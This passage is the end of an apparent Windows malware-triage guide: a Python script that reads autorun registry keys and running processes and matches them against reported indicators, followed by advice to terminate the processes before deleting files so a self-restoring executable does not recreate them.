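    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    observed = []
    for hive, key_path in sorted({(h, k) for h, k, _ in REPORTED_AUTORUNS}):
        try:
            with winreg.OpenKey(hives[hive], key_path) as key:
                index = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, index)
                    except OSError:  # no more values
                        break
                    observed.append((hive, key_path, name, data))
                    index += 1
        except OSError:  # key absent
            pass
    return observed


def collect_processes_windows():
    import csv
    import subprocess
    out = subprocess.run(["tasklist", "/FO", "CSV", "/NH"],
                         capture_output=True, text=True, check=True).stdout
    return [(int(row[1]), row[0]) for row in csv.reader(out.splitlines())
            if len(row) >= 2 and row[1].isdigit()]


def triage():
    if sys.platform != "win32":
        raise SystemExit("collection needs a Windows host")
    report = {
        "autoruns": match_autoruns(collect_autoruns_windows()),
        "files": match_files(expand_reported_paths()),
        "processes": match_processes(collect_processes_windows()),
    }
    for section, hits in report.items():
        print(f"{section}: {len(hits)} hit(s)")
        for hit in hits:
            print("   ", hit)
    return report


if __name__ == "__main__":
    triage()
```

Run it as the user whose profile is suspected (HKCU and %APPDATA% are per-user) and once more elevated so the HKLM RunOnce value is readable. Terminate the reported processes before deleting files, as the steps above say; otherwise the running executables, and RHELWSD0F.exe writing its own config next to itself, will recreate what was just removed.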